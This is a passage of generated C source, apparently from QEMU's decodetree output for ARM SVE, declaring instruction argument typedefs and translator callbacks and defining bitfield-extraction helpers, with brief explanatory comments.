arg_rrr_esz arg_TRN2_p; static bool trans_TRN2_p(DisasContext *ctx, arg_TRN2_p *a); typedef arg_rr_esz arg_REV_p; static bool trans_REV_p(DisasContext *ctx, arg_REV_p *a); typedef arg_rr_esz arg_PUNPKLO; static bool trans_PUNPKLO(DisasContext *ctx, arg_PUNPKLO *a); typedef arg_rr_esz arg_PUNPKHI; static bool trans_PUNPKHI(DisasContext *ctx, arg_PUNPKHI *a); typedef arg_rrr_esz arg_ZIP1_z; static bool trans_ZIP1_z(DisasContext *ctx, arg_ZIP1_z *a); typedef arg_rrr_esz arg_ZIP2_z; static bool trans_ZIP2_z(DisasContext *ctx, arg_ZIP2_z *a); typedef arg_rrr_esz arg_UZP1_z; static bool trans_UZP1_z(DisasContext *ctx, arg_UZP1_z *a); typedef arg_rrr_esz arg_UZP2_z; static bool trans_UZP2_z(DisasContext *ctx, arg_UZP2_z *a); typedef arg_rrr_esz arg_TRN1_z; static bool trans_TRN1_z(DisasContext *ctx, arg_TRN1_z *a); typedef arg_rrr_esz arg_TRN2_z; static bool trans_TRN2_z(DisasContext *ctx, arg_TRN2_z *a); typedef arg_rpr_esz arg_COMPACT; static bool trans_COMPACT(DisasContext *ctx, arg_COMPACT *a); typedef arg_rprr_esz arg_CLASTA_z; static bool trans_CLASTA_z(DisasContext *ctx, arg_CLASTA_z *a); typedef arg_rprr_esz arg_CLASTB_z; static bool trans_CLASTB_z(DisasContext *ctx, arg_CLASTB_z *a); typedef arg_rpr_esz arg_CLASTA_v; static bool 
trans_CLASTA_v(DisasContext *ctx, arg_CLASTA_v *a); typedef arg_rpr_esz arg_CLASTB_v; static bool trans_CLASTB_v(DisasContext *ctx, arg_CLASTB_v *a); typedef arg_rpr_esz arg_CLASTA_r; static bool trans_CLASTA_r(DisasContext *ctx, arg_CLASTA_r *a); typedef arg_rpr_esz arg_CLASTB_r; static bool trans_CLASTB_r(DisasContext *ctx, arg_CLASTB_r *a); typedef arg_rpr_esz arg_LASTA_v; static bool trans_LASTA_v(DisasContext *ctx, arg_LASTA_v *a); typedef arg_rpr_esz arg_LASTB_v; static bool trans_LASTB_v(DisasContext *ctx, arg_LASTB_v *a); typedef arg_rpr_esz arg_LASTA_r; static bool trans_LASTA_r(DisasContext *ctx, arg_LASTA_r *a); typedef arg_rpr_esz arg_LASTB_r; static bool trans_LASTB_r(DisasContext *ctx, arg_LASTB_r *a); typedef arg_rpr_esz arg_CPY_m_v; static bool trans_CPY_m_v(DisasContext *ctx, arg_CPY_m_v *a); typedef arg_rpr_esz arg_CPY_m_r; static bool trans_CPY_m_r(DisasContext *ctx, arg_CPY_m_r *a); typedef arg_rpr_esz arg_REVB; static bool trans_REVB(DisasContext *ctx, arg_REVB *a); typedef arg_rpr_esz arg_REVH; static bool trans_REVH(DisasContext *ctx, arg_REVH *a); typedef arg_rpr_esz arg_REVW; static bool trans_REVW(DisasContext *ctx, arg_REVW *a); typedef arg_rpr_esz arg_RBIT; static bool trans_RBIT(DisasContext *ctx, arg_RBIT *a); typedef arg_rprr_esz arg_SPLICE; static bool trans_SPLICE(DisasContext *ctx, arg_SPLICE *a); typedef arg_rprr_esz arg_SEL_zpzz; static bool trans_SEL_zpzz(DisasContext *ctx, arg_SEL_zpzz *a); typedef arg_rprr_esz arg_CMPHS_ppzz; static bool trans_CMPHS_ppzz(DisasContext *ctx, arg_CMPHS_ppzz *a); typedef arg_rprr_esz arg_CMPHI_ppzz; static bool trans_CMPHI_ppzz(DisasContext *ctx, arg_CMPHI_ppzz *a); typedef arg_rprr_esz arg_CMPGE_ppzz; static bool trans_CMPGE_ppzz(DisasContext *ctx, arg_CMPGE_ppzz *a); typedef arg_rprr_esz arg_CMPGT_ppzz; static bool trans_CMPGT_ppzz(DisasContext *ctx, arg_CMPGT_ppzz *a); typedef arg_rprr_esz arg_CMPEQ_ppzz; static bool trans_CMPEQ_ppzz(DisasContext *ctx, arg_CMPEQ_ppzz *a); typedef arg_rprr_esz arg_CMPNE_ppzz; static bool trans_CMPNE_ppzz(DisasContext *ctx, arg_CMPNE_ppzz *a); typedef arg_rprr_esz arg_CMPEQ_ppzw; static bool trans_CMPEQ_ppzw(DisasContext *ctx, arg_CMPEQ_ppzw *a); typedef arg_rprr_esz arg_CMPNE_ppzw; static bool trans_CMPNE_ppzw(DisasContext *ctx, arg_CMPNE_ppzw *a); typedef arg_rprr_esz arg_CMPGE_ppzw; static bool trans_CMPGE_ppzw(DisasContext *ctx, arg_CMPGE_ppzw *a); typedef arg_rprr_esz arg_CMPGT_ppzw; static bool trans_CMPGT_ppzw(DisasContext *ctx, arg_CMPGT_ppzw *a); typedef arg_rprr_esz arg_CMPLT_ppzw; static bool trans_CMPLT_ppzw(DisasContext *ctx, arg_CMPLT_ppzw *a); typedef arg_rprr_esz arg_CMPLE_ppzw; static bool trans_CMPLE_ppzw(DisasContext *ctx, arg_CMPLE_ppzw *a); typedef arg_rprr_esz arg_CMPHS_ppzw; static bool trans_CMPHS_ppzw(DisasContext *ctx, arg_CMPHS_ppzw *a); typedef arg_rprr_esz arg_CMPHI_ppzw; static bool trans_CMPHI_ppzw(DisasContext *ctx, arg_CMPHI_ppzw *a); typedef arg_rprr_esz arg_CMPLO_ppzw; static bool trans_CMPLO_ppzw(DisasContext *ctx, arg_CMPLO_ppzw *a); typedef arg_rprr_esz arg_CMPLS_ppzw; static bool trans_CMPLS_ppzw(DisasContext *ctx, arg_CMPLS_ppzw *a); typedef arg_rpri_esz arg_CMPHS_ppzi; static bool trans_CMPHS_ppzi(DisasContext *ctx, arg_CMPHS_ppzi *a); typedef arg_rpri_esz arg_CMPHI_ppzi; static bool trans_CMPHI_ppzi(DisasContext *ctx, arg_CMPHI_ppzi *a); typedef arg_rpri_esz arg_CMPLO_ppzi; static bool trans_CMPLO_ppzi(DisasContext *ctx, arg_CMPLO_ppzi *a); typedef arg_rpri_esz arg_CMPLS_ppzi; static bool trans_CMPLS_ppzi(DisasContext *ctx, arg_CMPLS_ppzi *a); 
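/*
 * Note on the structure of this generated file: scripts/decodetree.py
 * emits three artifacts for every pattern in sve.decode -- a shared
 * argument-set struct (arg_rpr_esz, arg_rprr_esz, ...), a per-instruction
 * typedef aliasing that struct (e.g. "typedef arg_rpri_esz
 * arg_CMPGE_ppzi;"), and a forward declaration of the trans_* callback
 * that the hand-written translator supplies.  The struct fields are
 * filled in from fixed bit positions of the instruction word by the
 * disas_sve_extract_* helpers further below, which build on the
 * extract32()/sextract32() bitfield helpers; for SVE, "esz" is the
 * log2 of the element size in bytes (0=B, 1=H, 2=S, 3=D).
 *
 * A minimal sketch of a trans_* callback, purely illustrative (the name
 * and emit_example_op() are hypothetical, not part of this file):
 *
 *     static bool trans_EXAMPLE(DisasContext *ctx, arg_rri_esz *a)
 *     {
 *         // a->rd, a->rn and a->imm were decoded by the extract helper.
 *         if (a->esz == 0) {
 *             return false;  // unhandled form: the caller reports an
 *                            // unallocated encoding
 *         }
 *         emit_example_op(ctx, a->esz, a->rd, a->rn, a->imm);
 *         return true;       // pattern fully handled
 *     }
 */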
typedef arg_rpri_esz arg_CMPGE_ppzi; static bool trans_CMPGE_ppzi(DisasContext *ctx, arg_CMPGE_ppzi *a); typedef arg_rpri_esz arg_CMPGT_ppzi; static bool trans_CMPGT_ppzi(DisasContext *ctx, arg_CMPGT_ppzi *a); typedef arg_rpri_esz arg_CMPLT_ppzi; static bool trans_CMPLT_ppzi(DisasContext *ctx, arg_CMPLT_ppzi *a); typedef arg_rpri_esz arg_CMPLE_ppzi; static bool trans_CMPLE_ppzi(DisasContext *ctx, arg_CMPLE_ppzi *a); typedef arg_rpri_esz arg_CMPEQ_ppzi; static bool trans_CMPEQ_ppzi(DisasContext *ctx, arg_CMPEQ_ppzi *a); typedef arg_rpri_esz arg_CMPNE_ppzi; static bool trans_CMPNE_ppzi(DisasContext *ctx, arg_CMPNE_ppzi *a); typedef arg_rprr_s arg_AND_pppp; static bool trans_AND_pppp(DisasContext *ctx, arg_AND_pppp *a); typedef arg_rprr_s arg_BIC_pppp; static bool trans_BIC_pppp(DisasContext *ctx, arg_BIC_pppp *a); typedef arg_rprr_s arg_EOR_pppp; static bool trans_EOR_pppp(DisasContext *ctx, arg_EOR_pppp *a); typedef arg_rprr_s arg_SEL_pppp; static bool trans_SEL_pppp(DisasContext *ctx, arg_SEL_pppp *a); typedef arg_rprr_s arg_ORR_pppp; static bool trans_ORR_pppp(DisasContext *ctx, arg_ORR_pppp *a); typedef arg_rprr_s arg_ORN_pppp; static bool trans_ORN_pppp(DisasContext *ctx, arg_ORN_pppp *a); typedef arg_rprr_s arg_NOR_pppp; static bool trans_NOR_pppp(DisasContext *ctx, arg_NOR_pppp *a); typedef arg_rprr_s arg_NAND_pppp; static bool trans_NAND_pppp(DisasContext *ctx, arg_NAND_pppp *a); typedef arg_disas_sve31 arg_PTEST; static bool trans_PTEST(DisasContext *ctx, arg_PTEST *a); typedef arg_ptrue arg_PTRUE; static bool trans_PTRUE(DisasContext *ctx, arg_PTRUE *a); typedef arg_disas_sve32 arg_SETFFR; static bool trans_SETFFR(DisasContext *ctx, arg_SETFFR *a); typedef arg_disas_sve33 arg_PFALSE; static bool trans_PFALSE(DisasContext *ctx, arg_PFALSE *a); typedef arg_disas_sve34 arg_RDFFR_p; static bool trans_RDFFR_p(DisasContext *ctx, arg_RDFFR_p *a); typedef arg_disas_sve33 arg_RDFFR; static bool trans_RDFFR(DisasContext *ctx, arg_RDFFR *a); typedef arg_disas_sve35 arg_WRFFR; static bool trans_WRFFR(DisasContext *ctx, arg_WRFFR *a); typedef arg_rr_esz arg_PFIRST; static bool trans_PFIRST(DisasContext *ctx, arg_PFIRST *a); typedef arg_rr_esz arg_PNEXT; static bool trans_PNEXT(DisasContext *ctx, arg_PNEXT *a); typedef arg_rprr_s arg_BRKPA; static bool trans_BRKPA(DisasContext *ctx, arg_BRKPA *a); typedef arg_rprr_s arg_BRKPB; static bool trans_BRKPB(DisasContext *ctx, arg_BRKPB *a); typedef arg_rpr_s arg_BRKA_z; static bool trans_BRKA_z(DisasContext *ctx, arg_BRKA_z *a); typedef arg_rpr_s arg_BRKB_z; static bool trans_BRKB_z(DisasContext *ctx, arg_BRKB_z *a); typedef arg_rpr_s arg_BRKA_m; static bool trans_BRKA_m(DisasContext *ctx, arg_BRKA_m *a); typedef arg_rpr_s arg_BRKB_m; static bool trans_BRKB_m(DisasContext *ctx, arg_BRKB_m *a); typedef arg_rpr_s arg_BRKN; static bool trans_BRKN(DisasContext *ctx, arg_BRKN *a); typedef arg_rpr_esz arg_CNTP; static bool trans_CNTP(DisasContext *ctx, arg_CNTP *a); typedef arg_incdec_pred arg_INCDECP_r; static bool trans_INCDECP_r(DisasContext *ctx, arg_INCDECP_r *a); typedef arg_incdec2_pred arg_INCDECP_z; static bool trans_INCDECP_z(DisasContext *ctx, arg_INCDECP_z *a); typedef arg_incdec_pred arg_SINCDECP_r_32; static bool trans_SINCDECP_r_32(DisasContext *ctx, arg_SINCDECP_r_32 *a); typedef arg_incdec_pred arg_SINCDECP_r_64; static bool trans_SINCDECP_r_64(DisasContext *ctx, arg_SINCDECP_r_64 *a); typedef arg_incdec2_pred arg_SINCDECP_z; static bool trans_SINCDECP_z(DisasContext *ctx, arg_SINCDECP_z *a); typedef arg_disas_sve36 arg_CTERM; static bool 
trans_CTERM(DisasContext *ctx, arg_CTERM *a); typedef arg_disas_sve37 arg_WHILE; static bool trans_WHILE(DisasContext *ctx, arg_WHILE *a); typedef arg_disas_sve38 arg_FDUP; static bool trans_FDUP(DisasContext *ctx, arg_FDUP *a); typedef arg_disas_sve38 arg_DUP_i; static bool trans_DUP_i(DisasContext *ctx, arg_DUP_i *a); typedef arg_rri_esz arg_ADD_zzi; static bool trans_ADD_zzi(DisasContext *ctx, arg_ADD_zzi *a); typedef arg_rri_esz arg_SUB_zzi; static bool trans_SUB_zzi(DisasContext *ctx, arg_SUB_zzi *a); typedef arg_rri_esz arg_SUBR_zzi; static bool trans_SUBR_zzi(DisasContext *ctx, arg_SUBR_zzi *a); typedef arg_rri_esz arg_SQADD_zzi; static bool trans_SQADD_zzi(DisasContext *ctx, arg_SQADD_zzi *a); typedef arg_rri_esz arg_UQADD_zzi; static bool trans_UQADD_zzi(DisasContext *ctx, arg_UQADD_zzi *a); typedef arg_rri_esz arg_SQSUB_zzi; static bool trans_SQSUB_zzi(DisasContext *ctx, arg_SQSUB_zzi *a); typedef arg_rri_esz arg_UQSUB_zzi; static bool trans_UQSUB_zzi(DisasContext *ctx, arg_UQSUB_zzi *a); typedef arg_rri_esz arg_SMAX_zzi; static bool trans_SMAX_zzi(DisasContext *ctx, arg_SMAX_zzi *a); typedef arg_rri_esz arg_UMAX_zzi; static bool trans_UMAX_zzi(DisasContext *ctx, arg_UMAX_zzi *a); typedef arg_rri_esz arg_SMIN_zzi; static bool trans_SMIN_zzi(DisasContext *ctx, arg_SMIN_zzi *a); typedef arg_rri_esz arg_UMIN_zzi; static bool trans_UMIN_zzi(DisasContext *ctx, arg_UMIN_zzi *a); typedef arg_rri_esz arg_MUL_zzi; static bool trans_MUL_zzi(DisasContext *ctx, arg_MUL_zzi *a); typedef arg_disas_sve39 arg_DOT_zzz; static bool trans_DOT_zzz(DisasContext *ctx, arg_DOT_zzz *a); typedef arg_disas_sve40 arg_DOT_zzx; static bool trans_DOT_zzx(DisasContext *ctx, arg_DOT_zzx *a); typedef arg_disas_sve41 arg_FCADD; static bool trans_FCADD(DisasContext *ctx, arg_FCADD *a); typedef arg_disas_sve42 arg_FCMLA_zpzzz; static bool trans_FCMLA_zpzzz(DisasContext *ctx, arg_FCMLA_zpzzz *a); typedef arg_disas_sve43 arg_FCMLA_zzxz; static bool trans_FCMLA_zzxz(DisasContext *ctx, arg_FCMLA_zzxz *a); typedef arg_disas_sve44 arg_FMLA_zzxz; static bool trans_FMLA_zzxz(DisasContext *ctx, arg_FMLA_zzxz *a); typedef arg_disas_sve45 arg_FMUL_zzx; static bool trans_FMUL_zzx(DisasContext *ctx, arg_FMUL_zzx *a); typedef arg_rpr_esz arg_FADDV; static bool trans_FADDV(DisasContext *ctx, arg_FADDV *a); typedef arg_rpr_esz arg_FMAXNMV; static bool trans_FMAXNMV(DisasContext *ctx, arg_FMAXNMV *a); typedef arg_rpr_esz arg_FMINNMV; static bool trans_FMINNMV(DisasContext *ctx, arg_FMINNMV *a); typedef arg_rpr_esz arg_FMAXV; static bool trans_FMAXV(DisasContext *ctx, arg_FMAXV *a); typedef arg_rpr_esz arg_FMINV; static bool trans_FMINV(DisasContext *ctx, arg_FMINV *a); typedef arg_rr_esz arg_FRECPE; static bool trans_FRECPE(DisasContext *ctx, arg_FRECPE *a); typedef arg_rr_esz arg_FRSQRTE; static bool trans_FRSQRTE(DisasContext *ctx, arg_FRSQRTE *a); typedef arg_rpr_esz arg_FCMGE_ppz0; static bool trans_FCMGE_ppz0(DisasContext *ctx, arg_FCMGE_ppz0 *a); typedef arg_rpr_esz arg_FCMGT_ppz0; static bool trans_FCMGT_ppz0(DisasContext *ctx, arg_FCMGT_ppz0 *a); typedef arg_rpr_esz arg_FCMLT_ppz0; static bool trans_FCMLT_ppz0(DisasContext *ctx, arg_FCMLT_ppz0 *a); typedef arg_rpr_esz arg_FCMLE_ppz0; static bool trans_FCMLE_ppz0(DisasContext *ctx, arg_FCMLE_ppz0 *a); typedef arg_rpr_esz arg_FCMEQ_ppz0; static bool trans_FCMEQ_ppz0(DisasContext *ctx, arg_FCMEQ_ppz0 *a); typedef arg_rpr_esz arg_FCMNE_ppz0; static bool trans_FCMNE_ppz0(DisasContext *ctx, arg_FCMNE_ppz0 *a); typedef arg_rprr_esz arg_FADDA; static bool trans_FADDA(DisasContext 
*ctx, arg_FADDA *a); typedef arg_rrr_esz arg_FADD_zzz; static bool trans_FADD_zzz(DisasContext *ctx, arg_FADD_zzz *a); typedef arg_rrr_esz arg_FSUB_zzz; static bool trans_FSUB_zzz(DisasContext *ctx, arg_FSUB_zzz *a); typedef arg_rrr_esz arg_FMUL_zzz; static bool trans_FMUL_zzz(DisasContext *ctx, arg_FMUL_zzz *a); typedef arg_rrr_esz arg_FTSMUL; static bool trans_FTSMUL(DisasContext *ctx, arg_FTSMUL *a); typedef arg_rrr_esz arg_FRECPS; static bool trans_FRECPS(DisasContext *ctx, arg_FRECPS *a); typedef arg_rrr_esz arg_FRSQRTS; static bool trans_FRSQRTS(DisasContext *ctx, arg_FRSQRTS *a); typedef arg_rprr_esz arg_FADD_zpzz; static bool trans_FADD_zpzz(DisasContext *ctx, arg_FADD_zpzz *a); typedef arg_rprr_esz arg_FSUB_zpzz; static bool trans_FSUB_zpzz(DisasContext *ctx, arg_FSUB_zpzz *a); typedef arg_rprr_esz arg_FMUL_zpzz; static bool trans_FMUL_zpzz(DisasContext *ctx, arg_FMUL_zpzz *a); typedef arg_rprr_esz arg_FMAXNM_zpzz; static bool trans_FMAXNM_zpzz(DisasContext *ctx, arg_FMAXNM_zpzz *a); typedef arg_rprr_esz arg_FMINNM_zpzz; static bool trans_FMINNM_zpzz(DisasContext *ctx, arg_FMINNM_zpzz *a); typedef arg_rprr_esz arg_FMAX_zpzz; static bool trans_FMAX_zpzz(DisasContext *ctx, arg_FMAX_zpzz *a); typedef arg_rprr_esz arg_FMIN_zpzz; static bool trans_FMIN_zpzz(DisasContext *ctx, arg_FMIN_zpzz *a); typedef arg_rprr_esz arg_FABD; static bool trans_FABD(DisasContext *ctx, arg_FABD *a); typedef arg_rprr_esz arg_FSCALE; static bool trans_FSCALE(DisasContext *ctx, arg_FSCALE *a); typedef arg_rprr_esz arg_FMULX; static bool trans_FMULX(DisasContext *ctx, arg_FMULX *a); typedef arg_rprr_esz arg_FDIV; static bool trans_FDIV(DisasContext *ctx, arg_FDIV *a); typedef arg_rpri_esz arg_FADD_zpzi; static bool trans_FADD_zpzi(DisasContext *ctx, arg_FADD_zpzi *a); typedef arg_rpri_esz arg_FSUB_zpzi; static bool trans_FSUB_zpzi(DisasContext *ctx, arg_FSUB_zpzi *a); typedef arg_rpri_esz arg_FMUL_zpzi; static bool trans_FMUL_zpzi(DisasContext *ctx, arg_FMUL_zpzi *a); typedef arg_rpri_esz arg_FSUBR_zpzi; static bool trans_FSUBR_zpzi(DisasContext *ctx, arg_FSUBR_zpzi *a); typedef arg_rpri_esz arg_FMAXNM_zpzi; static bool trans_FMAXNM_zpzi(DisasContext *ctx, arg_FMAXNM_zpzi *a); typedef arg_rpri_esz arg_FMINNM_zpzi; static bool trans_FMINNM_zpzi(DisasContext *ctx, arg_FMINNM_zpzi *a); typedef arg_rpri_esz arg_FMAX_zpzi; static bool trans_FMAX_zpzi(DisasContext *ctx, arg_FMAX_zpzi *a); typedef arg_rpri_esz arg_FMIN_zpzi; static bool trans_FMIN_zpzi(DisasContext *ctx, arg_FMIN_zpzi *a); typedef arg_disas_sve46 arg_FTMAD; static bool trans_FTMAD(DisasContext *ctx, arg_FTMAD *a); typedef arg_rprrr_esz arg_FMLA_zpzzz; static bool trans_FMLA_zpzzz(DisasContext *ctx, arg_FMLA_zpzzz *a); typedef arg_rprrr_esz arg_FMLS_zpzzz; static bool trans_FMLS_zpzzz(DisasContext *ctx, arg_FMLS_zpzzz *a); typedef arg_rprrr_esz arg_FNMLA_zpzzz; static bool trans_FNMLA_zpzzz(DisasContext *ctx, arg_FNMLA_zpzzz *a); typedef arg_rprrr_esz arg_FNMLS_zpzzz; static bool trans_FNMLS_zpzzz(DisasContext *ctx, arg_FNMLS_zpzzz *a); typedef arg_rpr_esz arg_FCVT_sh; static bool trans_FCVT_sh(DisasContext *ctx, arg_FCVT_sh *a); typedef arg_rpr_esz arg_FCVT_hs; static bool trans_FCVT_hs(DisasContext *ctx, arg_FCVT_hs *a); typedef arg_rpr_esz arg_FCVT_dh; static bool trans_FCVT_dh(DisasContext *ctx, arg_FCVT_dh *a); typedef arg_rpr_esz arg_FCVT_hd; static bool trans_FCVT_hd(DisasContext *ctx, arg_FCVT_hd *a); typedef arg_rpr_esz arg_FCVT_ds; static bool trans_FCVT_ds(DisasContext *ctx, arg_FCVT_ds *a); typedef arg_rpr_esz arg_FCVT_sd; static bool 
trans_FCVT_sd(DisasContext *ctx, arg_FCVT_sd *a); typedef arg_rpr_esz arg_FCVTZS_hh; static bool trans_FCVTZS_hh(DisasContext *ctx, arg_FCVTZS_hh *a); typedef arg_rpr_esz arg_FCVTZU_hh; static bool trans_FCVTZU_hh(DisasContext *ctx, arg_FCVTZU_hh *a); typedef arg_rpr_esz arg_FCVTZS_hs; static bool trans_FCVTZS_hs(DisasContext *ctx, arg_FCVTZS_hs *a); typedef arg_rpr_esz arg_FCVTZU_hs; static bool trans_FCVTZU_hs(DisasContext *ctx, arg_FCVTZU_hs *a); typedef arg_rpr_esz arg_FCVTZS_hd; static bool trans_FCVTZS_hd(DisasContext *ctx, arg_FCVTZS_hd *a); typedef arg_rpr_esz arg_FCVTZU_hd; static bool trans_FCVTZU_hd(DisasContext *ctx, arg_FCVTZU_hd *a); typedef arg_rpr_esz arg_FCVTZS_ss; static bool trans_FCVTZS_ss(DisasContext *ctx, arg_FCVTZS_ss *a); typedef arg_rpr_esz arg_FCVTZU_ss; static bool trans_FCVTZU_ss(DisasContext *ctx, arg_FCVTZU_ss *a); typedef arg_rpr_esz arg_FCVTZS_ds; static bool trans_FCVTZS_ds(DisasContext *ctx, arg_FCVTZS_ds *a); typedef arg_rpr_esz arg_FCVTZU_ds; static bool trans_FCVTZU_ds(DisasContext *ctx, arg_FCVTZU_ds *a); typedef arg_rpr_esz arg_FCVTZS_sd; static bool trans_FCVTZS_sd(DisasContext *ctx, arg_FCVTZS_sd *a); typedef arg_rpr_esz arg_FCVTZU_sd; static bool trans_FCVTZU_sd(DisasContext *ctx, arg_FCVTZU_sd *a); typedef arg_rpr_esz arg_FCVTZS_dd; static bool trans_FCVTZS_dd(DisasContext *ctx, arg_FCVTZS_dd *a); typedef arg_rpr_esz arg_FCVTZU_dd; static bool trans_FCVTZU_dd(DisasContext *ctx, arg_FCVTZU_dd *a); typedef arg_rpr_esz arg_FRINTN; static bool trans_FRINTN(DisasContext *ctx, arg_FRINTN *a); typedef arg_rpr_esz arg_FRINTP; static bool trans_FRINTP(DisasContext *ctx, arg_FRINTP *a); typedef arg_rpr_esz arg_FRINTM; static bool trans_FRINTM(DisasContext *ctx, arg_FRINTM *a); typedef arg_rpr_esz arg_FRINTZ; static bool trans_FRINTZ(DisasContext *ctx, arg_FRINTZ *a); typedef arg_rpr_esz arg_FRINTA; static bool trans_FRINTA(DisasContext *ctx, arg_FRINTA *a); typedef arg_rpr_esz arg_FRINTX; static bool trans_FRINTX(DisasContext *ctx, arg_FRINTX *a); typedef arg_rpr_esz arg_FRINTI; static bool trans_FRINTI(DisasContext *ctx, arg_FRINTI *a); typedef arg_rpr_esz arg_FRECPX; static bool trans_FRECPX(DisasContext *ctx, arg_FRECPX *a); typedef arg_rpr_esz arg_FSQRT; static bool trans_FSQRT(DisasContext *ctx, arg_FSQRT *a); typedef arg_rpr_esz arg_SCVTF_hh; static bool trans_SCVTF_hh(DisasContext *ctx, arg_SCVTF_hh *a); typedef arg_rpr_esz arg_SCVTF_sh; static bool trans_SCVTF_sh(DisasContext *ctx, arg_SCVTF_sh *a); typedef arg_rpr_esz arg_SCVTF_dh; static bool trans_SCVTF_dh(DisasContext *ctx, arg_SCVTF_dh *a); typedef arg_rpr_esz arg_SCVTF_ss; static bool trans_SCVTF_ss(DisasContext *ctx, arg_SCVTF_ss *a); typedef arg_rpr_esz arg_SCVTF_sd; static bool trans_SCVTF_sd(DisasContext *ctx, arg_SCVTF_sd *a); typedef arg_rpr_esz arg_SCVTF_ds; static bool trans_SCVTF_ds(DisasContext *ctx, arg_SCVTF_ds *a); typedef arg_rpr_esz arg_SCVTF_dd; static bool trans_SCVTF_dd(DisasContext *ctx, arg_SCVTF_dd *a); typedef arg_rpr_esz arg_UCVTF_hh; static bool trans_UCVTF_hh(DisasContext *ctx, arg_UCVTF_hh *a); typedef arg_rpr_esz arg_UCVTF_sh; static bool trans_UCVTF_sh(DisasContext *ctx, arg_UCVTF_sh *a); typedef arg_rpr_esz arg_UCVTF_dh; static bool trans_UCVTF_dh(DisasContext *ctx, arg_UCVTF_dh *a); typedef arg_rpr_esz arg_UCVTF_ss; static bool trans_UCVTF_ss(DisasContext *ctx, arg_UCVTF_ss *a); typedef arg_rpr_esz arg_UCVTF_sd; static bool trans_UCVTF_sd(DisasContext *ctx, arg_UCVTF_sd *a); typedef arg_rpr_esz arg_UCVTF_ds; static bool trans_UCVTF_ds(DisasContext *ctx, 
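/* The two-letter suffixes on the FCVT/FCVTZ[SU]/[SU]CVTF helpers name the
 * pair of element sizes involved (h = half, s = single, d = double); all of
 * these conversions share the generic arg_rpr_esz argument set. */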
arg_UCVTF_ds *a); typedef arg_rpr_esz arg_UCVTF_dd; static bool trans_UCVTF_dd(DisasContext *ctx, arg_UCVTF_dd *a); typedef arg_rri arg_LDR_pri; static bool trans_LDR_pri(DisasContext *ctx, arg_LDR_pri *a); typedef arg_rri arg_LDR_zri; static bool trans_LDR_zri(DisasContext *ctx, arg_LDR_zri *a); typedef arg_rpri_load arg_LD1R_zpri; static bool trans_LD1R_zpri(DisasContext *ctx, arg_LD1R_zpri *a); typedef arg_rprr_gather_load arg_LD1_zprz; static bool trans_LD1_zprz(DisasContext *ctx, arg_LD1_zprz *a); typedef arg_rpri_gather_load arg_LD1_zpiz; static bool trans_LD1_zpiz(DisasContext *ctx, arg_LD1_zpiz *a); typedef arg_rprr_load arg_LD_zprr; static bool trans_LD_zprr(DisasContext *ctx, arg_LD_zprr *a); typedef arg_rprr_load arg_LDFF1_zprr; static bool trans_LDFF1_zprr(DisasContext *ctx, arg_LDFF1_zprr *a); typedef arg_rpri_load arg_LD_zpri; static bool trans_LD_zpri(DisasContext *ctx, arg_LD_zpri *a); typedef arg_rpri_load arg_LDNF1_zpri; static bool trans_LDNF1_zpri(DisasContext *ctx, arg_LDNF1_zpri *a); typedef arg_rprr_load arg_LD1RQ_zprr; static bool trans_LD1RQ_zprr(DisasContext *ctx, arg_LD1RQ_zprr *a); typedef arg_rpri_load arg_LD1RQ_zpri; static bool trans_LD1RQ_zpri(DisasContext *ctx, arg_LD1RQ_zpri *a); typedef arg_disas_sve32 arg_PRF; static bool trans_PRF(DisasContext *ctx, arg_PRF *a); typedef arg_disas_sve47 arg_PRF_rr; static bool trans_PRF_rr(DisasContext *ctx, arg_PRF_rr *a); typedef arg_rri arg_STR_pri; static bool trans_STR_pri(DisasContext *ctx, arg_STR_pri *a); typedef arg_rri arg_STR_zri; static bool trans_STR_zri(DisasContext *ctx, arg_STR_zri *a); typedef arg_rpri_store arg_ST_zpri; static bool trans_ST_zpri(DisasContext *ctx, arg_ST_zpri *a); typedef arg_rprr_store arg_ST_zprr; static bool trans_ST_zprr(DisasContext *ctx, arg_ST_zprr *a); typedef arg_rprr_scatter_store arg_ST1_zprz; static bool trans_ST1_zprz(DisasContext *ctx, arg_ST1_zprz *a); typedef arg_rpri_scatter_store arg_ST1_zpiz; static bool trans_ST1_zpiz(DisasContext *ctx, arg_ST1_zpiz *a); static void disas_sve_extract_disas_sve_Fmt_55(DisasContext *ctx, arg_disas_sve25 *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->imm2 = sextract32(insn, 16, 5); a->imm1 = sextract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_disas_sve_Fmt_56(DisasContext *ctx, arg_disas_sve26 *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->rm = extract32(insn, 16, 5); a->imm = sextract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_disas_sve_Fmt_57(DisasContext *ctx, arg_rri_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->imm = sextract32(insn, 16, 5); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_disas_sve_Fmt_58(DisasContext *ctx, arg_disas_sve27 *a, uint32_t insn) { a->imm = sextract32(insn, 5, 6); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_disas_sve_Fmt_59(DisasContext *ctx, arg_disas_sve28 *a, uint32_t insn) { a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_disas_sve_Fmt_60(DisasContext *ctx, arg_disas_sve29 *a, uint32_t insn) { a->dbm = extract32(insn, 5, 13); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_disas_sve_Fmt_61(DisasContext *ctx, arg_rrri *a, uint32_t insn) { a->rm = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->rn = extract32(insn, 0, 5); a->imm = deposit32(extract32(insn, 10, 3), 3, 29, extract32(insn, 16, 5)); } static void disas_sve_extract_disas_sve_Fmt_62(DisasContext *ctx, 
